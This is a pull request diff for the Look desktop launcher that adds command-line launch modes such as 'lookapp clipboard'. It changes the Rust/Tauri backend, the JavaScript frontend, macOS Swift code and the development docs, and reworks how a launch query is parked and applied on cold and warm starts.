### PR TITLE
feat: Launch modes with params

### DIFF
--- a/DEVELOPMENT.md
+++ b/DEVELOPMENT.md
@@ -114,6 +114,18 @@ lookdev --list-modes
 
 Install it on its own with `make dev-cli`. It reads `LOOK_DEV_APP` and `LOOK_DEV_CONFIG` if you keep them elsewhere.
 
+On Linux there is no `lookdev`. The debug binary is the handle, and it already points at the dev config and database:
+
+```bash
+cd apps/linows
+nix develop -c cargo build --manifest-path src-tauri/Cargo.toml   # NixOS; elsewhere plain cargo build
+./src-tauri/target/debug/lookapp --list-modes    # prints and exits, no window
+./src-tauri/target/debug/lookapp clipboard       # cold start
+./src-tauri/target/debug/lookapp files report    # run again while it is up: the warm path
+```
+
+Both routes end at the same parked query (`take_launch_query`), but they reach it differently, so a mode is worth trying from cold and from a running instance. Under `cargo tauri dev` the arguments need two separators: `cargo tauri dev -- -- clipboard`.
+
 On Linux and Windows, a debug build separates its config and database (`setup_dev_env`) but shares `identifier` with the release build, and the single-instance plugin keys its lock on that. Debug builds therefore register under `com.look.desktop.dev` so a running release does not swallow a dev build's arguments (`lookapp <mode>`, see the README). That override is Linux-only: Windows derives its mutex from the identifier with no way to change it, so quit the installed app before testing a dev build there.
 
 Override the macOS dev config path:

--- a/DEVELOPMENT.md
+++ b/DEVELOPMENT.md
@@ -104,6 +104,18 @@ make app-run-dev
 
 `make app-run-dev` (macOS) builds a local Debug bundle, installs `/Applications/Look Dev.app` with bundle id `noah-code.Look.Dev`, leaves the Homebrew `/Applications/Look.app` untouched, then launches `Look Dev` with `LOOK_CONFIG_PATH=$HOME/.look/config.dev`. On Windows there is no separate dev install; use `make app-run` (hot reload) or `make app-run-release`.
 
+`lookapp` is a symlink to the **installed** app (`scripts/install-look.sh`), so it always runs the release binary no matter what you just built. `make app-install-dev` installs `lookdev` beside it as the same handle for the dev build:
+
+```bash
+lookdev                 # launch it with the dev config
+lookdev clipboard       # open it in a mode
+lookdev --list-modes
+```
+
+Install it on its own with `make dev-cli`. It reads `LOOK_DEV_APP` and `LOOK_DEV_CONFIG` if you keep them elsewhere.
+
+On Linux and Windows, a debug build separates its config and database (`setup_dev_env`) but shares `identifier` with the release build, and the single-instance plugin keys its lock on that. Debug builds therefore register under `com.look.desktop.dev` so a running release does not swallow a dev build's arguments (`lookapp <mode>`, see the README). That override is Linux-only: Windows derives its mutex from the identifier with no way to change it, so quit the installed app before testing a dev build there.
+
 Override the macOS dev config path:
 
 ```bash

--- a/apps/linows/src-tauri/src/consts.rs
+++ b/apps/linows/src-tauri/src/consts.rs
@@ -10,10 +10,6 @@ pub const EVENT_WINDOW_SHOWN: &str = "window-shown";
 /// the next summon from flashing the fully-visible strip then rewinding it (see
 /// superactions.armEntrance). Paired with the show-side `window-shown`.
 pub const EVENT_WINDOW_HIDDEN: &str = "window-hidden";
-/// Text a command line asked to put in the input (`lookapp clipboard`). Its own
-/// event rather than a wider `window-shown` payload, which every ordinary
-/// summon would then carry and ignore.
-pub const EVENT_LAUNCH_QUERY: &str = "launch-query";
 
 /// Windows process creation flag to suppress console windows.
 #[cfg(target_os = "windows")]

--- a/apps/linows/src-tauri/src/consts.rs
+++ b/apps/linows/src-tauri/src/consts.rs
@@ -10,6 +10,10 @@ pub const EVENT_WINDOW_SHOWN: &str = "window-shown";
 /// the next summon from flashing the fully-visible strip then rewinding it (see
 /// superactions.armEntrance). Paired with the show-side `window-shown`.
 pub const EVENT_WINDOW_HIDDEN: &str = "window-hidden";
+/// Text a command line asked to put in the input (`lookapp clipboard`). Its own
+/// event rather than a wider `window-shown` payload, which every ordinary
+/// summon would then carry and ignore.
+pub const EVENT_LAUNCH_QUERY: &str = "launch-query";
 
 /// Windows process creation flag to suppress console windows.
 #[cfg(target_os = "windows")]

--- a/apps/linows/src-tauri/src/main.rs
+++ b/apps/linows/src-tauri/src/main.rs
@@ -119,47 +119,54 @@ fn toggle_window(app_handle: &tauri::AppHandle) {
         // On GNOME X11, Focused(false) races with this handler -
         // auto-hide hides the window before we run, so is_visible
         // is false.  The 200ms guard prevents re-showing.
-        LAST_SHOWN_AT.store(now_ms(), Ordering::Relaxed);
-        FOCUSED_SINCE_SHOWN.store(false, Ordering::Relaxed);
-
-        // A layer surface is placed and stacked by the compositor; neither is
-        // ours to ask for.
-        #[cfg(target_os = "linux")]
-        let placed_by_compositor = platform::linux::layer_shell::is_active();
-        #[cfg(not(target_os = "linux"))]
-        let placed_by_compositor = false;
-
-        // Tiling WMs (i3, sway, Hyprland) ignore set_position on unmapped
-        // windows - they apply their own placement on map. So we must
-        // recenter AFTER show. Desktop environments (GNOME, KDE, …) work
-        // best with recenter BEFORE show to avoid a visible jump.
-        #[cfg(target_os = "linux")]
-        let tiling = platform::linux::wm::is_tiling_wm();
-        #[cfg(not(target_os = "linux"))]
-        let tiling = false;
-
-        if !placed_by_compositor {
-            if !tiling {
-                recenter_window(&window);
-            }
-            let _ = window.set_always_on_top(true);
-        }
-        commands::show_launcher_before_event(&window, || {
-            if !placed_by_compositor && tiling {
-                recenter_window(&window);
-            }
-        });
-        // For X11 windows (native X11, or XWayland when the AppImage forces
-        // GDK_BACKEND=x11), bypass the compositor's focus-stealing
-        // prevention by bumping _NET_WM_USER_TIME before activation.
-        #[cfg(target_os = "linux")]
-        if platform::linux::transparency::window_is_x11() {
-            platform::linux::window_focus::activate_self();
-            platform::linux::window_focus::notify_shown();
-        }
-
-        commands::focus_launcher(&window);
+        show_window(&window);
     }
+}
+
+/// Every summon goes through here. Placement, the X11 focus-stealing bypass and
+/// the focus call are one unit: a path that shows the window without them opens
+/// off-centre, or on top without the keyboard.
+fn show_window(window: &tauri::WebviewWindow) {
+    LAST_SHOWN_AT.store(now_ms(), Ordering::Relaxed);
+    FOCUSED_SINCE_SHOWN.store(false, Ordering::Relaxed);
+
+    // A layer surface is placed and stacked by the compositor; neither is
+    // ours to ask for.
+    #[cfg(target_os = "linux")]
+    let placed_by_compositor = platform::linux::layer_shell::is_active();
+    #[cfg(not(target_os = "linux"))]
+    let placed_by_compositor = false;
+
+    // Tiling WMs (i3, sway, Hyprland) ignore set_position on unmapped
+    // windows - they apply their own placement on map. So we must
+    // recenter AFTER show. Desktop environments (GNOME, KDE, …) work
+    // best with recenter BEFORE show to avoid a visible jump.
+    #[cfg(target_os = "linux")]
+    let tiling = platform::linux::wm::is_tiling_wm();
+    #[cfg(not(target_os = "linux"))]
+    let tiling = false;
+
+    if !placed_by_compositor {
+        if !tiling {
+            recenter_window(window);
+        }
+        let _ = window.set_always_on_top(true);
+    }
+    commands::show_launcher_before_event(window, || {
+        if !placed_by_compositor && tiling {
+            recenter_window(window);
+        }
+    });
+    // For X11 windows (native X11, or XWayland when the AppImage forces
+    // GDK_BACKEND=x11), bypass the compositor's focus-stealing
+    // prevention by bumping _NET_WM_USER_TIME before activation.
+    #[cfg(target_os = "linux")]
+    if platform::linux::transparency::window_is_x11() {
+        platform::linux::window_focus::activate_self();
+        platform::linux::window_focus::notify_shown();
+    }
+
+    commands::focus_launcher(window);
 }
 
 /// Center and scale a window to fit the current monitor.
@@ -613,12 +620,12 @@ fn main() {
     let single_instance =
         tauri_plugin_single_instance::Builder::<tauri::Wry>::new().callback(|app, args, _cwd| {
             if let Some(window) = app.get_webview_window(consts::MAIN_WINDOW) {
-                LAST_SHOWN_AT.store(now_ms(), Ordering::Relaxed);
                 // The second launch's argv, discarded here until now. Parked
                 // before the show, which is what the frontend pulls on.
                 park_launch(&modes::parse_args(args.iter().skip(1)));
-                commands::show_launcher(&window);
-                commands::focus_launcher(&window);
+                // The hotkey's summon, not a bare show: an explicit
+                // `lookapp <mode>` races no auto-hide, so it never toggles.
+                show_window(&window);
             }
         });
     // The plugin keys its lock on tauri.conf.json's `identifier`, which dev and
@@ -736,7 +743,7 @@ fn main() {
             // startup visibility it has today.
             if matches!(launch, modes::Launch::Query { .. }) {
                 park_launch(&launch);
-                commands::show_launcher(&window);
+                show_window(&window);
             }
 
             Ok(())

--- a/apps/linows/src-tauri/src/main.rs
+++ b/apps/linows/src-tauri/src/main.rs
@@ -568,9 +568,7 @@ fn take_launch_query() -> Option<String> {
 
 /// Park before showing: the pull hangs off `window-shown`.
 fn park_launch(launch: &modes::Launch) {
-    // Toggle is not implemented yet, so `--no-toggle` parses but changes
-    // nothing: every launch shows.
-    if let modes::Launch::Query { text, .. } = launch {
+    if let modes::Launch::Query { text } = launch {
         *PENDING_LAUNCH
             .lock()
             .unwrap_or_else(|poisoned| poisoned.into_inner()) = Some(text.clone());
@@ -595,6 +593,10 @@ fn main() {
         }
         modes::Launch::UnknownMode(name) => {
             eprintln!("lookapp: unknown mode \"{name}\"\n\n{}", modes::list_text());
+            std::process::exit(2);
+        }
+        modes::Launch::UnavailableMode(name) => {
+            eprintln!("lookapp: mode \"{name}\" is not available on this platform");
             std::process::exit(2);
         }
         _ => {}

--- a/apps/linows/src-tauri/src/main.rs
+++ b/apps/linows/src-tauri/src/main.rs
@@ -37,7 +37,7 @@ use state::AppState;
 use std::sync::Mutex;
 use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
 use std::time::{SystemTime, UNIX_EPOCH};
-use tauri::{Emitter, Manager};
+use tauri::Manager;
 
 /// Timestamp (ms) of last window show, used to debounce focus-loss auto-hide.
 static LAST_SHOWN_AT: AtomicU64 = AtomicU64::new(0);
@@ -548,11 +548,14 @@ fn focus_loss_means_dismiss() -> bool {
     !cfg!(target_os = "linux")
 }
 
-/// A cold-start launch query, parked for the frontend to pull.
+/// A launch query, parked for the frontend to pull.
 ///
-/// Cold start cannot push: at `setup()` the webview is still booting, so an
-/// emitted event has no listener and Tauri does not buffer it. The mode would
-/// vanish on the launch that matters most, the first keypress after login.
+/// Parked on every path rather than pushed: cold start cannot push at all (at
+/// `setup()` the webview is still booting, so an emitted event has no listener
+/// and Tauri does not buffer it), and on a warm launch a pushed event races
+/// `window-shown`, whose reset clears the query and whose `select()` leaves it
+/// selected for the next keystroke to replace. The frontend pulls after that
+/// reset, so the show always runs first.
 static PENDING_LAUNCH: Mutex<Option<String>> = Mutex::new(None);
 
 #[tauri::command]
@@ -563,14 +566,14 @@ fn take_launch_query() -> Option<String> {
         .take()
 }
 
-/// Called after the show, not before: `window-shown` focuses and selects the
-/// input, so an earlier query would sit selected and be replaced by the next
-/// keystroke.
-fn apply_launch(window: &tauri::WebviewWindow, launch: modes::Launch) {
+/// Park before showing: the pull hangs off `window-shown`.
+fn park_launch(launch: &modes::Launch) {
     // Toggle is not implemented yet, so `--no-toggle` parses but changes
     // nothing: every launch shows.
     if let modes::Launch::Query { text, .. } = launch {
-        let _ = window.emit(consts::EVENT_LAUNCH_QUERY, text);
+        *PENDING_LAUNCH
+            .lock()
+            .unwrap_or_else(|poisoned| poisoned.into_inner()) = Some(text.clone());
     }
 }
 
@@ -609,10 +612,11 @@ fn main() {
         tauri_plugin_single_instance::Builder::<tauri::Wry>::new().callback(|app, args, _cwd| {
             if let Some(window) = app.get_webview_window(consts::MAIN_WINDOW) {
                 LAST_SHOWN_AT.store(now_ms(), Ordering::Relaxed);
+                // The second launch's argv, discarded here until now. Parked
+                // before the show, which is what the frontend pulls on.
+                park_launch(&modes::parse_args(args.iter().skip(1)));
                 commands::show_launcher(&window);
                 commands::focus_launcher(&window);
-                // The second launch's argv, discarded here until now.
-                apply_launch(&window, modes::parse_args(args.iter().skip(1)));
             }
         });
     // The plugin keys its lock on tauri.conf.json's `identifier`, which dev and
@@ -728,10 +732,8 @@ fn main() {
 
             // Only when a mode was named: a normal launch keeps whatever
             // startup visibility it has today.
-            if let modes::Launch::Query { text, .. } = &launch {
-                *PENDING_LAUNCH
-                    .lock()
-                    .unwrap_or_else(|poisoned| poisoned.into_inner()) = Some(text.clone());
+            if matches!(launch, modes::Launch::Query { .. }) {
+                park_launch(&launch);
                 commands::show_launcher(&window);
             }
 

--- a/apps/linows/src-tauri/src/main.rs
+++ b/apps/linows/src-tauri/src/main.rs
@@ -30,12 +30,14 @@ mod trash;
 mod weather;
 mod weburl;
 
+use look_engine::modes;
 #[cfg(target_os = "linux")]
 use platform::linux::gpu;
 use state::AppState;
+use std::sync::Mutex;
 use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
 use std::time::{SystemTime, UNIX_EPOCH};
-use tauri::Manager;
+use tauri::{Emitter, Manager};
 
 /// Timestamp (ms) of last window show, used to debounce focus-loss auto-hide.
 static LAST_SHOWN_AT: AtomicU64 = AtomicU64::new(0);
@@ -546,12 +548,53 @@ fn focus_loss_means_dismiss() -> bool {
     !cfg!(target_os = "linux")
 }
 
+/// A cold-start launch query, parked for the frontend to pull.
+///
+/// Cold start cannot push: at `setup()` the webview is still booting, so an
+/// emitted event has no listener and Tauri does not buffer it. The mode would
+/// vanish on the launch that matters most, the first keypress after login.
+static PENDING_LAUNCH: Mutex<Option<String>> = Mutex::new(None);
+
+#[tauri::command]
+fn take_launch_query() -> Option<String> {
+    PENDING_LAUNCH
+        .lock()
+        .unwrap_or_else(|poisoned| poisoned.into_inner())
+        .take()
+}
+
+/// Called after the show, not before: `window-shown` focuses and selects the
+/// input, so an earlier query would sit selected and be replaced by the next
+/// keystroke.
+fn apply_launch(window: &tauri::WebviewWindow, launch: modes::Launch) {
+    // Toggle is not implemented yet, so `--no-toggle` parses but changes
+    // nothing: every launch shows.
+    if let modes::Launch::Query { text, .. } = launch {
+        let _ = window.emit(consts::EVENT_LAUNCH_QUERY, text);
+    }
+}
+
 fn main() {
     crash::install_panic_hook();
 
     if std::env::args().any(|a| a == "--version" || a == "-V") {
         println!("lookapp {}", env!("APP_VERSION"));
         return;
+    }
+
+    // Answered before the app starts, so asking what you can bind never costs
+    // a window.
+    let launch = modes::parse_args(std::env::args().skip(1));
+    match &launch {
+        modes::Launch::ListModes => {
+            print!("{}", modes::list_text());
+            return;
+        }
+        modes::Launch::UnknownMode(name) => {
+            eprintln!("lookapp: unknown mode \"{name}\"\n\n{}", modes::list_text());
+            std::process::exit(2);
+        }
+        _ => {}
     }
 
     #[cfg(debug_assertions)]
@@ -562,14 +605,27 @@ fn main() {
 
     sync_autostart();
 
-    let mut builder = tauri::Builder::default()
-        .plugin(tauri_plugin_single_instance::init(|app, _args, _cwd| {
+    let single_instance =
+        tauri_plugin_single_instance::Builder::<tauri::Wry>::new().callback(|app, args, _cwd| {
             if let Some(window) = app.get_webview_window(consts::MAIN_WINDOW) {
                 LAST_SHOWN_AT.store(now_ms(), Ordering::Relaxed);
                 commands::show_launcher(&window);
                 commands::focus_launcher(&window);
+                // The second launch's argv, discarded here until now.
+                apply_launch(&window, modes::parse_args(args.iter().skip(1)));
             }
-        }))
+        });
+    // The plugin keys its lock on tauri.conf.json's `identifier`, which dev and
+    // release share, so an installed release would swallow a dev build's argv
+    // (`setup_dev_env` separates the config and DB but not this). Only the debug
+    // name is set: release keeps the plugin default, leaving the identifier the
+    // single source of truth. Linux only - Windows derives its mutex from the
+    // identifier with no override, so there the release app has to be quit.
+    #[cfg(debug_assertions)]
+    let single_instance = single_instance.dbus_id("com.look.desktop.dev");
+
+    let mut builder = tauri::Builder::default()
+        .plugin(single_instance.build())
         .plugin(tauri_plugin_dialog::init())
         .manage(AppState::new())
         .manage(platform::IconCache::new());
@@ -670,6 +726,15 @@ fn main() {
                 let _ = window.set_background_color(Some(tauri::window::Color(0, 0, 0, 0)));
             }
 
+            // Only when a mode was named: a normal launch keeps whatever
+            // startup visibility it has today.
+            if let modes::Launch::Query { text, .. } = &launch {
+                *PENDING_LAUNCH
+                    .lock()
+                    .unwrap_or_else(|poisoned| poisoned.into_inner()) = Some(text.clone());
+                commands::show_launcher(&window);
+            }
+
             Ok(())
         })
         .invoke_handler(tauri::generate_handler![
@@ -684,6 +749,7 @@ fn main() {
             commands::force_index_refresh,
             commands::toggle_window,
             commands::hide_window,
+            take_launch_query,
             commands::confirm_hide,
             commands::set_blur_region,
             commands::quit_app,

--- a/apps/linows/src/js/app.js
+++ b/apps/linows/src/js/app.js
@@ -542,11 +542,8 @@ document.addEventListener('DOMContentLoaded', async () => {
         const input = rest.slice(spaceIdx + 1);
         commands.enterById(cmdId);
         enterCommandMode();
-        const cmdInput = document.getElementById('cmd-input');
-        if (cmdInput && input) {
-            cmdInput.value = input;
-            cmdInput.dispatchEvent(new Event('input'));
-        }
+        // After enter(), which resets the panel's input.
+        commands.prefill(input);
         queryInput.value = '';
         return true;
     }
@@ -711,6 +708,12 @@ document.addEventListener('DOMContentLoaded', async () => {
     function applyLaunchQuery(text) {
         if (!text) return;
         launchQueryAppliedAt = Date.now();
+        // A mode lands on whatever was left on screen last time. Everything
+        // that owns the content area comes down first, or the query renders
+        // behind it (macOS applyLaunchQuery does the same).
+        if (commands.isActive()) commands.exit();
+        if (settings.isActive()) settings.exit(contentArea, queryInput.parentElement);
+        keyboard.closeHelp();
         queryInput.value = text;
         // Through the listener, not straight to search: the prefix jump, the
         // layout swap out of the launchpad and the hint bar all hang off it.

--- a/apps/linows/src/js/app.js
+++ b/apps/linows/src/js/app.js
@@ -28,6 +28,8 @@ import { load } from './html-loader.js';
 import {
     onWindowShown,
     onWindowHidden,
+    onLaunchQuery,
+    takeLaunchQuery,
     confirmHide,
     onIndexReady,
     requestIndexRefresh,
@@ -695,6 +697,24 @@ document.addEventListener('DOMContentLoaded', async () => {
         // Last: the reveal is the frame the rest of the cascade lands in.
         motion.playReveal();
     });
+
+    // Launch modes: `lookapp clipboard` puts `c"` in the input and searches.
+    // The text only ever lands in the input, never acts.
+    function applyLaunchQuery(text) {
+        if (!text) return;
+        queryInput.value = text;
+        // Caret to the end, not selected: window-shown just ran select(), so
+        // the first keystroke would otherwise replace the mode.
+        const end = text.length;
+        queryInput.setSelectionRange(end, end);
+        queryInput.focus();
+        smoothcaret.refresh(queryInput);
+        search.handleQueryInput(text);
+    }
+
+    onLaunchQuery((event) => applyLaunchQuery(event.payload));
+    // Cold start: this listener did not exist when the backend ran.
+    takeLaunchQuery().then(applyLaunchQuery);
 
     // Hold the launchpad at its entrance-start pose before hiding, so the stale
     // buffer the compositor presents on the next summon matches frame 0 instead

--- a/apps/linows/src/js/app.js
+++ b/apps/linows/src/js/app.js
@@ -101,6 +101,10 @@ const BANNER_DURATION_SHORT = 1.0;
 const BANNER_DURATION_MEDIUM = 1.2;
 const BANNER_DURATION_LONG = 1.5;
 const KILL_FEEDBACK_DELAY_MS = 300;
+// How long a just-applied launch mode outranks the retention reset. The
+// cold-start pull can resolve just before a `window-shown` lands, and the reset
+// would wipe exactly what was asked for.
+const LAUNCH_QUERY_GRACE_MS = 500;
 
 // Layout modes applied to #results-area when the AI card is visible.
 // Stacked: card capped above results in col 1.
@@ -666,10 +670,12 @@ document.addEventListener('DOMContentLoaded', async () => {
         });
     });
 
+    let launchQueryAppliedAt = 0;
+
     // When the launcher is shown, optionally clear an expired query before the
     // usual focus/refresh/reveal pass runs.
     onWindowShown((event) => {
-        if (event.payload === true) {
+        if (event.payload === true && Date.now() - launchQueryAppliedAt >= LAUNCH_QUERY_GRACE_MS) {
             // Reuse the full "back to home" reset so query-owned UI like the
             // translate surface, preview visibility, and running-apps strip all
             // return to the normal empty-query state together.
@@ -704,6 +710,7 @@ document.addEventListener('DOMContentLoaded', async () => {
     // The text only ever lands in the input, never acts.
     function applyLaunchQuery(text) {
         if (!text) return;
+        launchQueryAppliedAt = Date.now();
         queryInput.value = text;
         // Through the listener, not straight to search: the prefix jump, the
         // layout swap out of the launchpad and the hint bar all hang off it.

--- a/apps/linows/src/js/app.js
+++ b/apps/linows/src/js/app.js
@@ -28,7 +28,6 @@ import { load } from './html-loader.js';
 import {
     onWindowShown,
     onWindowHidden,
-    onLaunchQuery,
     takeLaunchQuery,
     confirmHide,
     onIndexReady,
@@ -696,6 +695,9 @@ document.addEventListener('DOMContentLoaded', async () => {
         superactions.replayEnter();
         // Last: the reveal is the frame the rest of the cascade lands in.
         motion.playReveal();
+        // A launch mode waits here, after the reset and select() above: pushed
+        // any earlier it would be cleared or left selected.
+        takeLaunchQuery().then(applyLaunchQuery);
     });
 
     // Launch modes: `lookapp clipboard` puts `c"` in the input and searches.
@@ -703,17 +705,21 @@ document.addEventListener('DOMContentLoaded', async () => {
     function applyLaunchQuery(text) {
         if (!text) return;
         queryInput.value = text;
-        // Caret to the end, not selected: window-shown just ran select(), so
-        // the first keystroke would otherwise replace the mode.
+        // Through the listener, not straight to search: the prefix jump, the
+        // layout swap out of the launchpad and the hint bar all hang off it.
+        queryInput.dispatchEvent(new Event('input'));
+        // A `:cmd ` jump moved into the command panel and cleared the input.
+        if (queryInput.value !== text) return;
+        queryInput.focus();
+        // Caret at the end, not selected: a selected mode would be replaced by
+        // the first keystroke.
         const end = text.length;
         queryInput.setSelectionRange(end, end);
-        queryInput.focus();
         smoothcaret.refresh(queryInput);
-        search.handleQueryInput(text);
     }
 
-    onLaunchQuery((event) => applyLaunchQuery(event.payload));
-    // Cold start: this listener did not exist when the backend ran.
+    // Cold start: the show ran before this frontend existed, so no
+    // window-shown pull is coming.
     takeLaunchQuery().then(applyLaunchQuery);
 
     // Hold the launchpad at its entrance-start pose before hiding, so the stale

--- a/apps/linows/src/js/ipc.js
+++ b/apps/linows/src/js/ipc.js
@@ -334,12 +334,8 @@ export async function onWindowHidden(callback) {
     return listen('window-hidden', callback);
 }
 
-// Launch modes: the warm path pushes an event, a cold start parks the query
-// for takeLaunchQuery.
-export async function onLaunchQuery(callback) {
-    return listen('launch-query', callback);
-}
-
+// Launch modes: the backend parks the query, both cold and warm, and the
+// window-shown handler pulls it.
 export async function takeLaunchQuery() {
     return invoke('take_launch_query');
 }

--- a/apps/linows/src/js/ipc.js
+++ b/apps/linows/src/js/ipc.js
@@ -334,6 +334,16 @@ export async function onWindowHidden(callback) {
     return listen('window-hidden', callback);
 }
 
+// Launch modes: the warm path pushes an event, a cold start parks the query
+// for takeLaunchQuery.
+export async function onLaunchQuery(callback) {
+    return listen('launch-query', callback);
+}
+
+export async function takeLaunchQuery() {
+    return invoke('take_launch_query');
+}
+
 export async function getHealthIssues() {
     return invoke('get_health_issues');
 }

--- a/apps/linows/src/js/keyboard.js
+++ b/apps/linows/src/js/keyboard.js
@@ -752,11 +752,20 @@ async function copyClipboardEntry() {
     }
 }
 
-function toggleHelp() {
-    if (!helpScreen) return;
-    helpScreen.hidden = !helpScreen.hidden;
-    layout.setModal('help', !helpScreen.hidden);
+function setHelpVisible(show) {
+    if (!helpScreen || helpScreen.hidden === !show) return;
+    helpScreen.hidden = !show;
+    layout.setModal('help', show);
     syncHomeFn?.();
+}
+
+function toggleHelp() {
+    setHelpVisible(helpScreen?.hidden === true);
+}
+
+// A launch mode has to reach the search surface, and help covers it.
+export function closeHelp() {
+    setHelpVisible(false);
 }
 
 async function removeClipboardEntry() {

--- a/apps/linows/src/js/screens/commands/index.js
+++ b/apps/linows/src/js/screens/commands/index.js
@@ -71,6 +71,9 @@ export function enterById(cmdId) {
 }
 
 export function enter() {
+    // Re-entering with another command selected (a second `lookapp <mode>`)
+    // has to take the mounted panel down, or both render at once.
+    if (active) currentModule().exit();
     active = true;
     selectedIndex = COMMANDS.findIndex((c) => c.id === activeCommandId);
     if (selectedIndex < 0) selectedIndex = 0;
@@ -130,6 +133,17 @@ export function handleKey(e) {
 
 export function getActiveCommand() {
     return activeCommandId;
+}
+
+// Text that came in with the jump (`:calc 2+2`, `lookapp shell ls -la`) goes to
+// the panel's own input. Found from the panel, so a new command inherits this by
+// having an input bar rather than by being named here.
+export function prefill(text) {
+    if (!text) return;
+    const input = screen.querySelector(`#cmd-panel-${activeCommandId} .cmd-input-bar input`);
+    if (!input) return;
+    input.value = text;
+    input.dispatchEvent(new Event('input'));
 }
 
 // Delegate methods for app.js

--- a/apps/macos/LauncherApp/look-app/Support/LaunchModes.swift
+++ b/apps/macos/LauncherApp/look-app/Support/LaunchModes.swift
@@ -1,0 +1,110 @@
+import AppKit
+import Foundation
+
+@_silgen_name("look_modes_list_text")
+nonisolated
+private func look_modes_list_text() -> UnsafeMutablePointer<CChar>?
+
+@_silgen_name("look_modes_parse_json")
+nonisolated
+private func look_modes_parse_json(_ argvJSON: UnsafePointer<CChar>?) -> UnsafeMutablePointer<CChar>?
+
+@_silgen_name("look_free_cstring")
+nonisolated
+private func look_free_cstring(_ ptr: UnsafeMutablePointer<CChar>?)
+
+/// `lookapp clipboard`: open the launcher already in a mode. The table and the
+/// argv grammar live in core (`core/engine/modes.rs`); this carries the answer
+/// across and nothing else.
+enum LaunchModes {
+    /// Scoped to this bundle id so `lookapp` drives the installed app and
+    /// `lookdev` drives Look Dev, rather than whichever answers first.
+    static var deliveryNotification: Notification.Name {
+        Notification.Name("look.launchQueryDelivered.\(bundleID)")
+    }
+
+    /// A query this process will serve itself, applied once the launcher is up.
+    nonisolated(unsafe) static var pendingQuery: String?
+
+    /// An exit code when the process has said its piece and should stop before
+    /// SwiftUI starts, or nil to keep launching.
+    static func handleLaunchArguments() -> Int32? {
+        switch parse(Array(CommandLine.arguments.dropFirst())) {
+        case .normal:
+            return nil
+
+        case .listModes:
+            print(listText(), terminator: "")
+            return 0
+
+        case .unknownMode(let name):
+            FileHandle.standardError.write(
+                Data("lookapp: unknown mode \"\(name)\"\n\n\(listText())".utf8))
+            return 2
+
+        case .query(let text):
+            guard isSameAppAlreadyRunning() else {
+                pendingQuery = text
+                return nil
+            }
+            DistributedNotificationCenter.default().postNotificationName(
+                deliveryNotification, object: text, userInfo: nil, deliverImmediately: true)
+            return 0
+        }
+    }
+
+    private enum Launch {
+        case normal
+        case query(String)
+        case listModes
+        case unknownMode(String)
+    }
+
+    private struct Decision: Decodable {
+        let kind: String
+        let text: String?
+        let name: String?
+    }
+
+    private static var bundleID: String {
+        Bundle.main.bundleIdentifier ?? "unknown"
+    }
+
+    private static func parse(_ arguments: [String]) -> Launch {
+        guard
+            let argv = try? JSONEncoder().encode(arguments),
+            let decision = call(look_modes_parse_json, with: String(decoding: argv, as: UTF8.self)),
+            let decoded = try? JSONDecoder().decode(Decision.self, from: Data(decision.utf8))
+        else {
+            return .normal
+        }
+
+        switch decoded.kind {
+        case "query": return decoded.text.map(Launch.query) ?? .normal
+        case "list_modes": return .listModes
+        case "unknown_mode": return .unknownMode(decoded.name ?? "")
+        default: return .normal
+        }
+    }
+
+    private static func listText() -> String {
+        guard let ptr = look_modes_list_text() else { return "" }
+        defer { look_free_cstring(ptr) }
+        return String(cString: ptr)
+    }
+
+    private static func call(
+        _ function: (UnsafePointer<CChar>?) -> UnsafeMutablePointer<CChar>?, with argument: String
+    ) -> String? {
+        guard let ptr = argument.withCString({ function($0) }) else { return nil }
+        defer { look_free_cstring(ptr) }
+        return String(cString: ptr)
+    }
+
+    private static func isSameAppAlreadyRunning() -> Bool {
+        let current = NSRunningApplication.current.processIdentifier
+        return NSWorkspace.shared.runningApplications.contains {
+            $0.bundleIdentifier == bundleID && $0.processIdentifier != current
+        }
+    }
+}

--- a/apps/macos/LauncherApp/look-app/Support/LaunchModes.swift
+++ b/apps/macos/LauncherApp/look-app/Support/LaunchModes.swift
@@ -42,6 +42,11 @@ enum LaunchModes {
                 Data("lookapp: unknown mode \"\(name)\"\n\n\(listText())".utf8))
             return 2
 
+        case .unavailableMode(let name):
+            FileHandle.standardError.write(
+                Data("lookapp: mode \"\(name)\" is not available on this platform\n".utf8))
+            return 2
+
         case .query(let text):
             guard isSameAppAlreadyRunning() else {
                 pendingQuery = text
@@ -58,6 +63,7 @@ enum LaunchModes {
         case query(String)
         case listModes
         case unknownMode(String)
+        case unavailableMode(String)
     }
 
     private struct Decision: Decodable {
@@ -83,6 +89,7 @@ enum LaunchModes {
         case "query": return decoded.text.map(Launch.query) ?? .normal
         case "list_modes": return .listModes
         case "unknown_mode": return .unknownMode(decoded.name ?? "")
+        case "unavailable_mode": return .unavailableMode(decoded.name ?? "")
         default: return .normal
         }
     }

--- a/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView+WindowControl.swift
+++ b/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView+WindowControl.swift
@@ -181,7 +181,7 @@ extension LauncherView {
         revealLauncherWindowIfHidden()
     }
 
-    private func revealLauncherWindowIfHidden() {
+    func revealLauncherWindowIfHidden() {
         guard let window = launcherWindow(), !window.isVisible else { return }
 
         // Only when nothing is stored yet: the launcher is frontmost whenever the

--- a/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView+WindowControl.swift
+++ b/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView+WindowControl.swift
@@ -181,6 +181,23 @@ extension LauncherView {
         revealLauncherWindowIfHidden()
     }
 
+    /// Show for a `lookapp <mode>` delivery, from hidden or from the background.
+    ///
+    /// Never activates before capturing: `captureFrontmostAppForRestoreIfNeeded`
+    /// nils the pid when Look is already frontmost, and then Esc has nothing to
+    /// hand focus back to and the terminal you typed in never returns.
+    func revealLauncherWindowForLaunch() {
+        guard let window = launcherWindow(), window.isVisible else {
+            revealLauncherWindowIfHidden()
+            return
+        }
+        if pidToRestoreOnHide == nil {
+            captureFrontmostAppForRestoreIfNeeded()
+        }
+        NSApplication.shared.activate(ignoringOtherApps: true)
+        window.makeKeyAndOrderFront(nil)
+    }
+
     func revealLauncherWindowIfHidden() {
         guard let window = launcherWindow(), !window.isVisible else { return }
 

--- a/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView.swift
+++ b/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView.swift
@@ -1059,8 +1059,7 @@ struct LauncherView: View {
                 for: LaunchModes.deliveryNotification)
         ) { notification in
             guard let text = notification.object as? String else { return }
-            NSApplication.shared.activate(ignoringOtherApps: true)
-            revealLauncherWindowIfHidden()
+            revealLauncherWindowForLaunch()
